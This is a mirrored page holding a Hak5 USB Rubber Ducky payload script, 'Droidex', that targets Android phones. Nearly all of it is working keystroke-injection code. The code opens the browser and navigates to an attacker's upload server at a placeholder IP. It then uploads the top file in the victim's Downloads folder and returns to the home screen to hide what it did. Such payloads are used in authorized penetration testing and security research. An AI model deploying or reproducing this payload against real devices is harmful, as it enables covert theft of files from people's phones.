Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
hak5
GitHub Repository: hak5/usbrubberducky-payloads
Path: blob/master/payloads/library/mobile/Android/Droidex/payload.txt
2971 views
1
REM TITLE: Droidex
2
REM AUTHOR: OSINTI4L (https://github.com/OSINTI4L)
3
REM TARGET OS: Android (tested on Samsung S24 FE | Android 15 | One UI 7.0)
4
REM DESCRIPTION: Droidex exfiltrates the top file stored in the Downloads directory of target mobile device to a self-hosted python webserver over LAN. To function you will need a webserver hosted locally on a personal machine and corresponding webserver IP address (see ReadMe). Place the server IP address on line 6 #IPA constant.
5
6
DEFINE #IPA x.x.x.x:8000/upload
7
8
REM: Begin attack:
9
ATTACKMODE HID
10
DELAY 1000
11
12
REM: Navigating to Google Search to access web browser:
13
GUI f
14
DELAY 600
15
STRING google search
16
DELAY 100
17
ENTER
18
DELAY 400
19
DOWNARROW
20
DELAY 400
21
ENTER
22
DELAY 400
23
24
REM Navigating to upload portal and accessing files:
25
STRINGLN #IPA
26
DELAY 700
27
TAB
28
ENTER
29
DELAY 600
30
31
REM Selecting file:
32
ENTER
33
DELAY 400
34
TAB
35
ENTER
36
37
REM Navigating browser to google.com and returning to home screen to obfuscate activity:
38
DELAY 1200
39
TAB
40
DELAY 150
41
STRINGLN google.com
42
GUI h
43
44